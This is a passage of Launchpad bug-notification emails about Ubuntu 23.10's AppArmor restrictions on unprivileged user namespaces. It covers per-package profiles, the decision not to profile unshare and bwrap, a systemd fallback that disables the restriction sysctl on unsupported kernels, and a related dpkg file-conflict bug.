/etc/apparmor.d/usr.bin.ch-run abi , include /usr/bin/ch-run flags=(unconfined) { userns, # Site-specific additions and overrides. See local/README for details. include if exists } However, in a few select cases, it has been decided not to ship an apparmor profile, since this would effectively allow this mitigation to be bypassed. In particular, the unshare and setns binaries within the util-linux package are installed on every Ubuntu system, and allow an unprivileged user the ability to launch an arbitrary application within a new user namespace. Any malicious application then that wished to exploit an unprivileged user namespace to conduct an attack on the kernel would simply need to spawn itself via `unshare -U` or similar to be granted this permission. Therefore, due to the ubiquitous nature of the unshare (and setns) binaries, profiles are not planned to be provided for these by default. Similarly, the bwrap binary within bubblewrap is also installed by default on Ubuntu Desktop 23.10 and can also be used to launch arbitrary binaries within a new user namespace and so no profile is planned to be provided for this either. Those packages for which either a profile is not required or which a profile is not planned are listed below, whilst the list of packages that require a profile (and their associated binaries) is listed at the end: Packages that use user namespaces but for which a profile is not required or not planned: - bubblewrap - /usr/bin/bwrap (NOT PLANNED AS NOTED ABOVE) - cifs-utils - /usr/sbin/cifs.upcall (NOT REQUIRED AS IS EXECUTED AS root) - consfigurator # NOT REQUIRED, NO BINARIES OR reverse-depends - criu - /usr/sbin/criu (NOT REQUIRED SINCE ONLY FUNCTIONS AS root) - docker.io-app - /usr/bin/dockerd (NOT REQUIRED SINCE RUNS AS root) - firejail - /usr/bin/firejail (NOT REQUIRED SINCE is suid root) - golang-github-containers-storage - /usr/bin/containers-storage (NOT REQUIRED SINCE ONLY FUNCTIONS AS root) - golang-gvisor-gvisor - /usr/bin/runsc (NOT REQUIRED SINCE ONLY FUNCTIONS AS root) - guix - /usr/bin/guix-daemon (NOT REQURIED SINCE RUNS AS root) - libvdestack # NOT REQUIRED, NO BINARIES OR reverse-depends - libvirt # NOT REQUIRED SINCE USES lxc WHICH WILL HAVE A PROFILE - network-manager # NOT REQUIRED SINCE CODE IS UNUSED - nix # APPEARS UNNEEDED IN DEFAULT CONFIGURATION - ocaml-extunix # NO BINARIES OR reverse-depends - passt - /usr/bin/passt # IS EXPECTED TO BE EXECUTED AS root - rust-rustix # NO BINARIES AND CODE IS UNUSED IN THE ARCHIVE - util-linux - Packages that use unprivileged user namespaces which require a profile (or already have one as part of the previous apparmor update in 4.0.0~alpha2-0ubuntu1
[Touch-packages] [Bug 2036302] Re: apparmor 4.0.0~alpha2-0ubuntu3 ships same file as liblxc-common
Uploaded in apparmor 4.0.0~alpha2-0ubuntu4 - currently waiting to build etc - https://launchpad.net/ubuntu/mantic/+queue?queue_state=3_text=apparmor ** Changed in: apparmor (Ubuntu) Status: Triaged => Fix Committed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/2036302 Title: apparmor 4.0.0~alpha2-0ubuntu3 ships same file as liblxc-common Status in apparmor package in Ubuntu: Fix Committed Status in lxc package in Ubuntu: Triaged Bug description: When running apt-get distupgrade I saw this message: Preparing to unpack .../apparmor_4.0.0~alpha2-0ubuntu3_amd64.deb ... Unpacking apparmor (4.0.0~alpha2-0ubuntu3) over (4.0.0~alpha2-0ubuntu2) ... dpkg: error processing archive /var/cache/apt/archives/apparmor_4.0.0~alpha2-0ubuntu3_amd64.deb (--unpack): trying to overwrite '/etc/apparmor.d/usr.bin.lxc-start', which is also in package liblxc-common 1:5.0.1-0ubuntu6 dpkg-deb: error: paste subprocess was killed by signal (Broken pipe) The problem could be overcome with: sudo apt-get install liblxc-common --reinstall which resulted in output Preparing to unpack .../liblxc-common_1%3a5.0.1-0ubuntu6_amd64.deb ... Unpacking liblxc-common (1:5.0.1-0ubuntu6) over (1:5.0.1-0ubuntu6) ... I have seen the same type of problem before with other packages. I would have expected apt-get to correctly sequence all necessary actions on its own. These are related events in my apt history: Start-Date: 2022-10-30 05:33:09 Commandline: apt-get install lxc Requested-By: ubuntu (1000) Install: liblxc-common:amd64 (1:5.0.0~git2209-g5a7b9ce67-0ubuntu3, automatic) Start-Date: 2023-01-28 11:06:34 Commandline: apt-get dist-upgrade Requested-By: ubuntu (1000) Upgrade: liblxc-common:amd64 (1:5.0.0~git2209-g5a7b9ce67-0ubuntu3, 1:5.0.1-0ubuntu6) ProblemType: Bug DistroRelease: Ubuntu 23.10 Package: apt 2.7.3 ProcVersionSignature: Ubuntu 6.5.0-5.5-generic 6.5.0 Uname: Linux 6.5.0-5-generic x86_64 NonfreeKernelModules: zfs ApportVersion: 2.27.0-0ubuntu2 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: KDE Date: Sat Sep 16 11:12:36 2023 InstallationDate: Installed on 2021-07-01 (807 days ago) InstallationMedia: Kubuntu 21.04 "Hirsute Hippo" - Release amd64 (20210420) SourcePackage: apt UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2036302/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2036302] Re: apparmor 4.0.0~alpha2-0ubuntu3 ships same file as liblxc-common
Apologies for this - I am working on an update now to resolve it. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/2036302 Title: apparmor 4.0.0~alpha2-0ubuntu3 ships same file as liblxc-common Status in apparmor package in Ubuntu: Triaged Status in lxc package in Ubuntu: Triaged Bug description: When running apt-get distupgrade I saw this message: Preparing to unpack .../apparmor_4.0.0~alpha2-0ubuntu3_amd64.deb ... Unpacking apparmor (4.0.0~alpha2-0ubuntu3) over (4.0.0~alpha2-0ubuntu2) ... dpkg: error processing archive /var/cache/apt/archives/apparmor_4.0.0~alpha2-0ubuntu3_amd64.deb (--unpack): trying to overwrite '/etc/apparmor.d/usr.bin.lxc-start', which is also in package liblxc-common 1:5.0.1-0ubuntu6 dpkg-deb: error: paste subprocess was killed by signal (Broken pipe) The problem could be overcome with: sudo apt-get install liblxc-common --reinstall which resulted in output Preparing to unpack .../liblxc-common_1%3a5.0.1-0ubuntu6_amd64.deb ... Unpacking liblxc-common (1:5.0.1-0ubuntu6) over (1:5.0.1-0ubuntu6) ... I have seen the same type of problem before with other packages. I would have expected apt-get to correctly sequence all necessary actions on its own. These are related events in my apt history: Start-Date: 2022-10-30 05:33:09 Commandline: apt-get install lxc Requested-By: ubuntu (1000) Install: liblxc-common:amd64 (1:5.0.0~git2209-g5a7b9ce67-0ubuntu3, automatic) Start-Date: 2023-01-28 11:06:34 Commandline: apt-get dist-upgrade Requested-By: ubuntu (1000) Upgrade: liblxc-common:amd64 (1:5.0.0~git2209-g5a7b9ce67-0ubuntu3, 1:5.0.1-0ubuntu6) ProblemType: Bug DistroRelease: Ubuntu 23.10 Package: apt 2.7.3 ProcVersionSignature: Ubuntu 6.5.0-5.5-generic 6.5.0 Uname: Linux 6.5.0-5-generic x86_64 NonfreeKernelModules: zfs ApportVersion: 2.27.0-0ubuntu2 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: KDE Date: Sat Sep 16 11:12:36 2023 InstallationDate: Installed on 2021-07-01 (807 days ago) InstallationMedia: Kubuntu 21.04 "Hirsute Hippo" - Release amd64 (20210420) SourcePackage: apt UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2036302/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
@sil2100 - apologies, I think I wasn't clear - for the actual enablement to take effect, this FFe does require the new kernel - BUT I added some fallback logic to detect if the kernel doesn't support the required feature so that the sysctl gets disabled in that case when the apparmor service is starting but before it has loaded any profiles. As such, we can safely land FFe this before the kernel lands. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2036128 Title: [FFe] enable unprivileged user namespace restrictions by default for mantic Status in apparmor package in Ubuntu: New Bug description: As per https://discourse.ubuntu.com/t/spec-unprivileged-user- namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor. In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu- kernel/ubuntu/+source/linux/+git/mantic/commit?h=master- next=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased. Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications. As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package. As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic: userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns) unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0) if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then if [ "$unconfined_userns" -eq 0 ]; then # userns restrictions rely on unconfined userns to be supported echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled" sysctl -w kernel.apparmor_restrict_unprivileged_userns=0 fi fi this allows a local admin to disable the sysctl via the regular sysctl.d conf approach, but to also make sure we don't inadvertently enable it when it is not supported by the kernel. This proposed change has been tested via the QA Regression Testing project, in particular with the specific test added in https://git.launchpad.net/qa-regression- testing/commit/?id=6f2c5ab7c8659174adac772ce0e894328bb5045d This produces the following output, confirming the fallback works as expected on the current mantic kernel (which does not fully support the userns restrictions): --- Running test: './test-apparmor.py' distro: 'Ubuntu 23.10' kernel: '6.5.0-5.5 (Ubuntu 6.5.0-5.5-generic 6.5.0)' arch: 'amd64' init: 'systemd' uid: 0/0 SUDO_USER: 'ubuntu') test_unconfined_userns (__main__.ApparmorTest.test_unconfined_userns) Test that unconfined userns restrictions are applied ... Skipping private tests WARN: kernel rate limiting in effect Disabling ratelimiting until the next reboot. To renable, run: # sysctl -w kernel.printk_ratelimit=5 (enabling userns restrictions) (restarting apparmor) (checking userns restrictions got disabled) ok -- Ran 1 test in 0.232s OK --- Also we can see on a fresh-boot with this new version installed that apparmor.service shows it has disabled the sysctl before loading any profiles even though the conf file has it enabled - and finally we can see that unshare -U works as expected: root@sec-mantic-amd64:~# uptime 07:04:48 up 0 min, 0 user, load average: 0.00, 0.00, 0.00 root@sec-mantic-amd64:~# journalctl -b0 --unit apparmor.service --no-pager Sep 15 07:04:47 sec-mantic-amd64 systemd[1]: Starting apparmor.service - Load AppArmor profiles... Sep 15 07:04:47
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
I have uploaded this new version to https://launchpad.net/~alexmurray/+archive/ubuntu/lp2036128 and so it should be built soon (from which the build log will be available). Please let me know if any other information is required. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2036128 Title: [FFe] enable unprivileged user namespace restrictions by default for mantic Status in apparmor package in Ubuntu: New Bug description: As per https://discourse.ubuntu.com/t/spec-unprivileged-user- namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor. In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu- kernel/ubuntu/+source/linux/+git/mantic/commit?h=master- next=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased. Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications. As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package. As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic: userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns) unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0) if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then if [ "$unconfined_userns" -eq 0 ]; then # userns restrictions rely on unconfined userns to be supported echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled" sysctl -w kernel.apparmor_restrict_unprivileged_userns=0 fi fi this allows a local admin to disable the sysctl via the regular sysctl.d conf approach, but to also make sure we don't inadvertently enable it when it is not supported by the kernel. This proposed change has been tested via the QA Regression Testing project, in particular with the specific test added in https://git.launchpad.net/qa-regression- testing/commit/?id=6f2c5ab7c8659174adac772ce0e894328bb5045d This produces the following output, confirming the fallback works as expected on the current mantic kernel (which does not fully support the userns restrictions): --- Running test: './test-apparmor.py' distro: 'Ubuntu 23.10' kernel: '6.5.0-5.5 (Ubuntu 6.5.0-5.5-generic 6.5.0)' arch: 'amd64' init: 'systemd' uid: 0/0 SUDO_USER: 'ubuntu') test_unconfined_userns (__main__.ApparmorTest.test_unconfined_userns) Test that unconfined userns restrictions are applied ... Skipping private tests WARN: kernel rate limiting in effect Disabling ratelimiting until the next reboot. To renable, run: # sysctl -w kernel.printk_ratelimit=5 (enabling userns restrictions) (restarting apparmor) (checking userns restrictions got disabled) ok -- Ran 1 test in 0.232s OK --- Also we can see on a fresh-boot with this new version installed that apparmor.service shows it has disabled the sysctl before loading any profiles even though the conf file has it enabled - and finally we can see that unshare -U works as expected: root@sec-mantic-amd64:~# uptime 07:04:48 up 0 min, 0 user, load average: 0.00, 0.00, 0.00 root@sec-mantic-amd64:~# journalctl -b0 --unit apparmor.service --no-pager Sep 15 07:04:47 sec-mantic-amd64 systemd[1]: Starting apparmor.service - Load AppArmor profiles... Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[308]: Restarting AppArmor Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[308]: disabling unprivileged userns restrictions since unconfined userns is
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
apt log when installing new apparmor packages ** Description changed: As per https://discourse.ubuntu.com/t/spec-unprivileged-user-namespace- restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor. In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu- kernel/ubuntu/+source/linux/+git/mantic/commit?h=master- next=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased. Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications. As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package. As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic: userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns) unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0) if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then - if [ $unconfined_userns -eq 0 ]; then - # userns restrictions rely on unconfined userns to be supported - echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled" - sysctl -w kernel.apparmor_restrict_unprivileged_userns=0 - fi + if [ "$unconfined_userns" -eq 0 ]; then + # userns restrictions rely on unconfined userns to be supported + echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled" + sysctl -w kernel.apparmor_restrict_unprivileged_userns=0 + fi fi + this allows a local admin to disable the sysctl via the regular sysctl.d + conf approach, but to also make sure we don't inadvertently enable it + when it is not supported by the kernel. - this allows a local admin to disable the sysctl via the regular sysctl.d conf approach, but to also make sure we don't inadvertently enable it when it is not supported by the kernel. + This proposed change has been tested via the QA Regression Testing + project, in particular with the specific test added in + https://git.launchpad.net/qa-regression- + testing/commit/?id=6f2c5ab7c8659174adac772ce0e894328bb5045d + + This produces the following output, confirming the fallback works as + expected on the current mantic kernel (which does not fully support the + userns restrictions): + + --- + + Running test: './test-apparmor.py' distro: 'Ubuntu 23.10' kernel: '6.5.0-5.5 (Ubuntu 6.5.0-5.5-generic 6.5.0)' arch: 'amd64' init: 'systemd' uid: 0/0 SUDO_USER: 'ubuntu') + test_unconfined_userns (__main__.ApparmorTest.test_unconfined_userns) + Test that unconfined userns restrictions are applied ... Skipping private tests + + WARN: kernel rate limiting in effect + Disabling ratelimiting until the next reboot. To renable, run: + # sysctl -w kernel.printk_ratelimit=5 + + (enabling userns restrictions) (restarting apparmor) (checking userns + restrictions got disabled) ok + + -- + Ran 1 test in 0.232s + + OK + + --- + + + Also we can see on a fresh-boot with this new version installed that apparmor.service shows it has disabled the sysctl before loading any profiles even though the conf file has it enabled - and finally we can see that unshare -U works as expected: + + root@sec-mantic-amd64:~# uptime + 07:04:48 up 0 min, 0 user, load average: 0.00, 0.00, 0.00 + + root@sec-mantic-amd64:~# journalctl -b0 --unit apparmor.service --no-pager + Sep 15 07:04:47 sec-mantic-amd64 systemd[1]: Starting apparmor.service - Load AppArmor profiles... + Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[308]: Restarting AppArmor + Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[308]: disabling unprivileged userns restrictions since
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
Proposed changes for FFe to enable the sysctl by default but add fallback logic to disable it if the system doesn't provide all the required features. ** Patch added: "apparmor_4.0.0~alpha2-0ubuntu4.debdiff" https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2036128/+attachment/5701125/+files/apparmor_4.0.0~alpha2-0ubuntu4.debdiff -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2036128 Title: [FFe] enable unprivileged user namespace restrictions by default for mantic Status in apparmor package in Ubuntu: New Bug description: As per https://discourse.ubuntu.com/t/spec-unprivileged-user- namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor. In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu- kernel/ubuntu/+source/linux/+git/mantic/commit?h=master- next=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased. Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications. As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package. As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic: userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns) unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0) if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then if [ "$unconfined_userns" -eq 0 ]; then # userns restrictions rely on unconfined userns to be supported echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled" sysctl -w kernel.apparmor_restrict_unprivileged_userns=0 fi fi this allows a local admin to disable the sysctl via the regular sysctl.d conf approach, but to also make sure we don't inadvertently enable it when it is not supported by the kernel. This proposed change has been tested via the QA Regression Testing project, in particular with the specific test added in https://git.launchpad.net/qa-regression- testing/commit/?id=6f2c5ab7c8659174adac772ce0e894328bb5045d This produces the following output, confirming the fallback works as expected on the current mantic kernel (which does not fully support the userns restrictions): --- Running test: './test-apparmor.py' distro: 'Ubuntu 23.10' kernel: '6.5.0-5.5 (Ubuntu 6.5.0-5.5-generic 6.5.0)' arch: 'amd64' init: 'systemd' uid: 0/0 SUDO_USER: 'ubuntu') test_unconfined_userns (__main__.ApparmorTest.test_unconfined_userns) Test that unconfined userns restrictions are applied ... Skipping private tests WARN: kernel rate limiting in effect Disabling ratelimiting until the next reboot. To renable, run: # sysctl -w kernel.printk_ratelimit=5 (enabling userns restrictions) (restarting apparmor) (checking userns restrictions got disabled) ok -- Ran 1 test in 0.232s OK --- Also we can see on a fresh-boot with this new version installed that apparmor.service shows it has disabled the sysctl before loading any profiles even though the conf file has it enabled - and finally we can see that unshare -U works as expected: root@sec-mantic-amd64:~# uptime 07:04:48 up 0 min, 0 user, load average: 0.00, 0.00, 0.00 root@sec-mantic-amd64:~# journalctl -b0 --unit apparmor.service --no-pager Sep 15 07:04:47 sec-mantic-amd64 systemd[1]: Starting apparmor.service - Load AppArmor profiles... Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[308]: Restarting AppArmor Sep 15 07:04:47
[Touch-packages] [Bug 2036128] [NEW] [FFe] enable unprivileged user namespace restrictions by default for mantic
Public bug reported: As per https://discourse.ubuntu.com/t/spec-unprivileged-user-namespace- restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor. In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu- kernel/ubuntu/+source/linux/+git/mantic/commit?h=master- next=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased. Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications. As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package. As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic: userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns) unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0) if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then if [ $unconfined_userns -eq 0 ]; then # userns restrictions rely on unconfined userns to be supported echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled" sysctl -w kernel.apparmor_restrict_unprivileged_userns=0 fi fi this allows a local admin to disable the sysctl via the regular sysctl.d conf approach, but to also make sure we don't inadvertently enable it when it is not supported by the kernel. ** Affects: apparmor (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2036128 Title: [FFe] enable unprivileged user namespace restrictions by default for mantic Status in apparmor package in Ubuntu: New Bug description: As per https://discourse.ubuntu.com/t/spec-unprivileged-user- namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor. In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu- kernel/ubuntu/+source/linux/+git/mantic/commit?h=master- next=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased. Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications. As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package. As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic: userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns) unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0) if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then if [ $unconfined_userns -eq 0 ]; then # userns restrictions rely on unconfined userns to be supported echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled" sysctl -w
[Touch-packages] [Bug 2035315] [NEW] Unprivileged user namespace restrictions break various applications
- /usr/bin/lxc-usernsexec - mmdebstrap - /usr/bin/mmdebstrap - ocproxy - /usr/bin/vpnns - qt6-webengine - /usr/lib/qt6/libexec/QtWebEngineProcess - qtwebengine-opensource-src - /usr/lib/@{multiarch}/qt5/libexec/QtWebEngineProcess - rootlesskit - /usr/bin/rootlesskit - rpm - /usr/bin/rpm - runc - /usr/sbin/runc The usage of CLONE_NEWUSER within the following packages were not able to be analysed fully and so profile are included for all relevant binaries: - rust-virtiofsd - /usr/libexec/virtiofsd - sbuild - /usr/bin/sbuild - /usr/bin/sbuild-abort - /usr/bin/sbuild-apt - /usr/bin/sbuild-checkpackages - /usr/bin/sbuild-clean - /usr/bin/sbuild-createchroot - /usr/bin/sbuild-distupgrade - /usr/bin/sbuild-hold - /usr/bin/sbuild-shell - /usr/bin/sbuild-unhold - /usr/bin/sbuild-update - /usr/bin/sbuild-upgrade - /usr/sbin/sbuild-adduser - /usr/sbin/sbuild-destroychroot - slirp4netns - /usr/bin/slirp4netns - stress-ng - /usr/bin/stress-ng - systemd - thunderbird - /usr/bin/thunderbird - toybox - /bin/toybox - trinity - /usr/bin/trinity - tup - /usr/bin/tup - userbindmount - /usr/bin/userbindmount - uwsgi - /usr/bin/uwsgi-core - vdens - /usr/bin/vdens Finally as noted in https://bugs.launchpad.net/ubuntu/+source/linux- meta-nvidia-5.19/+bug/2017980 the popular third-party application Google Chrome also requires unprivileged user namespaces: - google-chrome - /opt/google/chrome/chrome ** Affects: apparmor (Ubuntu) Importance: High Assignee: Alex Murray (alexmurray) Status: Confirmed ** Changed in: apparmor (Ubuntu) Assignee: (unassigned) => Alex Murray (alexmurray) ** Changed in: apparmor (Ubuntu) Importance: Undecided => High ** Changed in: apparmor (Ubuntu) Status: New => Confirmed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2035315 Title: Unprivileged user namespace restrictions break various applications Status in apparmor package in Ubuntu: Confirmed Bug description: When the unprivileged user namespace restrictions are enabled, various applications within and outside the Ubuntu archive fail to function, as they use unprivileged user namespaces as part of their normal operation. A search of the Ubuntu archive for the 23.10 release was performed looking for all applications that make legitimate use of the CLONE_NEWUSER argument, the details of which can be seen in https://docs.google.com/spreadsheets/d/1MOPVoTW0BROF1TxYqoWeJ3c6w2xKElI4w-VjdCG0m9s/edit#gid=2102562502 For each package identified in that list, an investigation was made to determine if the application actually used this as an unprivileged user, and if so which of the binaries within the package were affected. The full investigation can be seen in https://warthogs.atlassian.net/browse/SEC-1898 (which is unfortunately private) but is summarised to the following list of Ubuntu source packages, with the affected binaries as noted. NOTE that due to time constraints for some packages it was not possible to finish the complete investigation and so for those *all* the binaries from the package are listed below. For each of these binaries, an apparmor profile is required so that the binary can be granted use of unprivileged user namespaces - an example profile for the ch-run binary within the charliecloud package is shown: $ cat /etc/apparmor.d/usr.bin.ch-run abi , include /usr/bin/ch-run flags=(unconfined) { userns, # Site-specific additions and overrides. See local/README for details. include if exists } However, in a few select cases, it has been decided not to ship an apparmor profile, since this would effectively allow this mitigation to be bypassed. In particular, the unshare and setns binaries within the util-linux package are installed on every Ubuntu system, and allow an unprivileged user the ability to launch an arbitrary application within a new user namespace. Any malicious application then that wished to exploit an unprivileged user namespace to conduct an attack on the kernel would simply need to spawn itself via `unshare -U` or similar to be granted this permission. Therefore, due to the ubiquitous nature of the unshare (and setns) binaries, profiles are not planned to be provided for these by default. Similarly, the bwrap binary within bubblewrap is also installed by default on Ubuntu Desktop 23.10 and can also be used to launch arbitrary binaries within a new user namespace and so no profile is planned to be provided for this either. Those packages for which either a profile is not required or which a 